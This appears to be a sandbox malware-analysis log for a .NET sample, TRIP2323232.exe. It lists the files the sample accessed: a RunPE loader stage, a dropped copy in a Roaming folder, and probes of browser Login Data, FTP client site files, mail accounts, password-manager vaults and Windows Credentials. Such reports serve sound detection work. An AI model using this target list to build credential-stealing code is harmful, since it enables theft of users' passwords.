Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven04_64 Seven04_64 VirtualBox 2018-09-09 19:20:30 2018-09-09 19:24:18 228

12 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\TRIP2323232.exe.config
C:\Users\Seven01\AppData\Local\Temp\TRIP2323232.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\TRIP2323232.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\TRIP2323232.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol36.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Users\Seven01\AppData\Local\Temp\it-IT\TRIP2323232.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\TRIP2323232.resources\TRIP2323232.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\TRIP2323232.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\TRIP2323232.resources\TRIP2323232.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Users\Seven01\AppData\Local\Temp\it\TRIP2323232.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\TRIP2323232.resources\TRIP2323232.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\TRIP2323232.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\TRIP2323232.resources\TRIP2323232.resources.exe
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2288.31347515
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2288.31347515
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2288.31347765
C:\Program Files\NETGATE\Black Hawk
C:\Program Files (x86)\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}
C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalComodo\Dragon\Login Data
C:\Users\Seven01\AppData\LocalComodo\Dragon\Default\Login Data
C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Login Data
C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome\Login Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome\Default\Login Data
C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalNichrome\Login Data
C:\Users\Seven01\AppData\LocalNichrome\Default\Login Data
C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalRockMelt\Login Data
C:\Users\Seven01\AppData\LocalRockMelt\Default\Login Data
C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalSpark\Login Data
C:\Users\Seven01\AppData\LocalSpark\Default\Login Data
C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalChromium\Login Data
C:\Users\Seven01\AppData\LocalChromium\Default\Login Data
C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalTitan Browser\Login Data
C:\Users\Seven01\AppData\LocalTitan Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalTorch\Login Data
C:\Users\Seven01\AppData\LocalTorch\Default\Login Data
C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Login Data
C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Default\Login Data
C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Login Data
C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalCocCoc\Browser\Login Data
C:\Users\Seven01\AppData\LocalCocCoc\Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalVivaldi\Login Data
C:\Users\Seven01\AppData\LocalVivaldi\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalComodo\Chromodo\Login Data
C:\Users\Seven01\AppData\LocalComodo\Chromodo\Default\Login Data
C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalSuperbird\Login Data
C:\Users\Seven01\AppData\LocalSuperbird\Default\Login Data
C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalCoowon\Coowon\Login Data
C:\Users\Seven01\AppData\LocalCoowon\Coowon\Default\Login Data
C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalMustang Browser\Login Data
C:\Users\Seven01\AppData\LocalMustang Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\Local360Browser\Browser\Login Data
C:\Users\Seven01\AppData\Local360Browser\Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Login Data
C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Login Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Default\Login Data
C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalOrbitum\Login Data
C:\Users\Seven01\AppData\LocalOrbitum\Default\Login Data
C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalIridium\Login Data
C:\Users\Seven01\AppData\LocalIridium\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Login Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Login Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\Seven01\AppData\Local\QupZilla\profiles\default\browsedata.db
C:\Users\Seven01\AppData\Roaming\Opera
C:\Users\Seven01\AppData\Roaming\.purple\accounts.xml
C:\Users\Seven01\Documents\SuperPutty
C:\Program Files (x86)\FTPShell\ftpshell.fsi
C:\Users\Seven01\AppData\Roaming\Notepad++\plugins\config\NppFTP\NppFTP.xml
C:\Program Files (x86)\oZone3D\MyFTP\myftp.ini
C:\Users\Seven01\AppData\Roaming\FTPBox\profiles.conf
C:\Program Files (x86)\Sherrod Computers\sherrod FTP\favorites
C:\Program Files (x86)\FTP Now\sites.xml
C:\Program Files (x86)\NexusFile\userdata\ftpsite.ini
C:\Users\Seven01\AppData\Roaming\NexusFile\ftpsite.ini
C:\Users\Seven01\Documents\NetSarang\Xftp\Sessions
C:\Users\Seven01\AppData\Roaming\NetSarang\Xftp\Sessions
C:\Program Files (x86)\EasyFTP\data
C:\Users\Seven01\AppData\Roaming\SftpNetDrive
C:\Program Files (x86)\AbleFTP7\encPwd.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\encPwd.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\encPwd.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\encPwd.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\encPwd.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\encPwd.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\encPwd.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\encPwd.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\encPwd.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\encPwd.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\encPwd.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\encPwd.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\encPwd.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\encPwd.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\encPwd.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\encPwd.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize7\encPwd.jsd
C:\Program Files (x86)\Automize7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize8\encPwd.jsd
C:\Program Files (x86)\Automize8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize9\encPwd.jsd
C:\Program Files (x86)\Automize9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize10\encPwd.jsd
C:\Program Files (x86)\Automize10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize11\encPwd.jsd
C:\Program Files (x86)\Automize11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize12\encPwd.jsd
C:\Program Files (x86)\Automize12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize13\encPwd.jsd
C:\Program Files (x86)\Automize13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize14\encPwd.jsd
C:\Program Files (x86)\Automize14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize14\data\settings\ftpProfiles-j.jsd
C:\Users\Seven01\AppData\Roaming\Cyberduck
C:\Users\Seven01\AppData\Roaming\iterate_GmbH
C:\Users\Seven01\.config\fullsync\profiles.xml
C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.xml
C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.cfg
C:\Program Files (x86)\FileZilla\Filezilla.xml
C:\Users\Seven01\AppData\Roaming\FileZilla\filezilla.xml
C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml
C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml
C:\Program Files (x86)\Staff-FTP\sites.ini
C:\Users\Seven01\AppData\Roaming\BlazeFtp\site.dat
C:\Program Files (x86)\Fastream NETFile\My FTP Links
C:\Program Files (x86)\GoFTP\settings\Connections.txt
C:\Users\Seven01\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
C:\Program Files (x86)\DeluxeFTP\sites.xml
C:\Windows\wcx_ftp.ini
C:\Users\Seven01\AppData\Roaming\wcx_ftp.ini
C:\Users\Seven01\wcx_ftp.ini
C:\Users\Seven01\AppData\Roaming\GHISLER\wcx_ftp.ini
C:\Program Files (x86)\FTPGetter\Profile\servers.xml
C:\Users\Seven01\AppData\Roaming\FTPGetter\servers.xml
C:\Program Files (x86)\WS_FTP\WS_FTP.INI
C:\Windows\WS_FTP.INI
C:\Users\Seven01\AppData\Roaming\Ipswitch
C:\Users\Seven01\site.xml
C:\Users\Seven01\AppData\Local\PokerStars*
C:\Users\Seven01\AppData\Local\ExpanDrive
C:\Users\Seven01\AppData\Roaming\Steed\bookmarks.txt
C:\Users\Seven01\AppData\Roaming\FlashFXP
C:\ProgramData\FlashFXP
C:\Users\Seven01\AppData\Local\INSoftware\NovaFTP\NovaFTP.db
C:\Users\Seven01\AppData\Roaming\NetDrive\NDSites.ini
C:\Users\Seven01\AppData\Roaming\NetDrive2\drives.dat
C:\ProgramData\NetDrive2\drives.dat
C:\Users\Seven01\AppData\Roaming\SmartFTP
C:\Users\Seven01\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
C:\Users\Seven01\Documents\*.tlp
C:\Users\Seven01\Documents\*.bscp
C:\Users\Seven01\Documents\*.vnc
C:\Users\Seven01\Desktop\*.vnc
C:\Users\Seven01\Documents\mSecure
C:\ProgramData\Syncovery
C:\Program Files (x86)\FreshWebmaster\FreshFTP\FtpSites.SMF
C:\Users\Seven01\AppData\Roaming\BitKinex\bitkinex.ds
C:\Users\Seven01\AppData\Roaming\UltraFXP\sites.xml
C:\Users\Seven01\AppData\Roaming\FTP Now\sites.xml
C:\Program Files (x86)\Odin Secure FTP Expert\QFDefault.QFQ
C:\Program Files (x86)\Odin Secure FTP Expert\SiteInfo.QFP
C:\Program Files (x86)\Foxmail\mail
C:\Foxmail*
C:\Users\Seven01\AppData\Roaming\Pocomail\accounts.ini
C:\Users\Seven01\Documents\Pocomail\accounts.ini
C:\Users\Seven01\AppData\Roaming\GmailNotifierPro\ConfigData.xml
C:\Users\Seven01\AppData\Roaming\DeskSoft\CheckMail
C:\Program Files (x86)\WinFtp Client\Favorites.dat
C:\Windows\32BitFtp.TMP
C:\Windows\32BitFtp.ini
C:\FTP Navigator\Ftplist.txt
C:\Softwarenetz\Mailing\Daten\mailing.vdt
C:\Users\Seven01\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
C:\Users\Seven01\Documents\*Mailbox.ini
C:\Users\Seven01\Documents\yMail2\POP3.xml
C:\Users\Seven01\Documents\yMail2\SMTP.xml
C:\Users\Seven01\Documents\yMail2\Accounts.xml
C:\Users\Seven01\Documents\yMail\ymail.ini
C:\Users\Seven01\AppData\Roaming\TrulyMail\Data\Settings\user.config
C:\Users\Seven01\Documents\*.spn
C:\Users\Seven01\Desktop\*.spn
C:\Users\Seven01\AppData\Roaming\To-Do DeskList\tasks.db
C:\Users\Seven01\AppData\Roaming\stickies\images
C:\Users\Seven01\AppData\Roaming\stickies\rtf
C:\Users\Seven01\AppData\Roaming\NoteFly\notes
C:\Users\Seven01\AppData\Roaming\Conceptworld\Notezilla\Notes8.db
C:\Users\Seven01\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt
C:\Users\Seven01\Documents
C:\Users\Seven01\Documents\*.kdbx
C:\Users\Seven01\Desktop
C:\Users\Seven01\Desktop\*.kdbx
C:\Users\Seven01\Documents\*.kdb
C:\Users\Seven01\Desktop\*.kdb
C:\Users\Seven01\Documents\Enpass
C:\Users\Seven01\Documents\My RoboForm Data
C:\Users\Seven01\Documents\1Password
C:\Users\Seven01\AppData\Local\Temp\Mikrotik\Winbox
C:\Users\Seven01\AppData\Local\Temp\NETAPI32.DLL
C:\Windows\System32\netapi32.dll
C:\Users\Seven01\AppData\Local\Temp\netutils.dll
C:\Windows\System32\netutils.dll
C:\Users\Seven01\AppData\Local\Temp\srvcli.dll
C:\Windows\System32\srvcli.dll
C:\Users\Seven01\AppData\Roaming\E62877
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials
C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials\*
C:\Users\Seven01\AppData\Local\Microsoft\Credentials
C:\Users\Seven01\AppData\Local\Microsoft\Credentials\*
C:\Users\Seven01\AppData\Local\Temp\trip2323232.exe
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe
C:\Windows\Temp
C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44
C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b
C:\Windows\sysnative\LogFiles\Scm\2f57269b-1e09-4e2d-ab1e-b0fdac7d279c
C:\Windows\sysnative\Tasks\Microsoft\Windows\WDI\ResolutionHost
C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp
C:\Windows\ServiceProfiles
C:\Windows\ServiceProfiles\LocalService
C:\Windows\sysnative\LogFiles\Scm\994c86ad-a929-4b2c-88a0-4e25a107a029
C:\Windows\sysnative\LogFiles\Scm\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec
C:\Windows\sysnative\Tasks\Microsoft\Windows\Time Synchronization\SynchronizeTime
C:\Windows\sysnative\LogFiles\Scm\47536d45-eeec-4bdc-8183-a4dc1f8da9e4
C:\Windows\sysnative\LogFiles\Scm\5c0aeeea-c154-45be-8499-bea5f11baff6
C:\Windows\sysnative\LogFiles\Scm\a7c73732-9f11-4281-8d19-764d4ec9d94d
C:\Windows\sysnative\LogFiles\Scm\ac4e5acf-89f7-4220-ba21-81ee183975e2
C:\Windows\sysnative\LogFiles\Scm\b4bdb6a0-417f-4e60-a0ac-aa00b1c79b4c
C:\Windows\sysnative\LogFiles\Scm\be669c13-8165-4536-96d0-6d6c39292aae
C:\Windows\sysnative\LogFiles\Scm\ca4b8ff2-a4d2-4d88-a52e-3a5bdaf7f56e
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Windows\sysnative\LogFiles\Scm\fb3c354d-297a-4eb2-9b58-090f6361906b
C:\Windows\sysnative\LogFiles\Scm\fdd56c73-f0d5-41b6-b767-6effd7966428
C:\Windows\sysnative\it-IT\radarrs.dll.mui
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache-System.dat
C:\Windows\Fonts\arial.ttf
C:\Windows\Fonts\ariali.ttf
C:\Windows\Fonts\arialbd.ttf
C:\Windows\Fonts\arialbi.ttf
C:\Windows\Fonts\batang.ttc
C:\Windows\Fonts\cour.ttf
C:\Windows\Fonts\couri.ttf
C:\Windows\Fonts\courbd.ttf
C:\Windows\Fonts\courbi.ttf
C:\Windows\Fonts\daunpenh.ttf
C:\Windows\Fonts\dokchamp.ttf
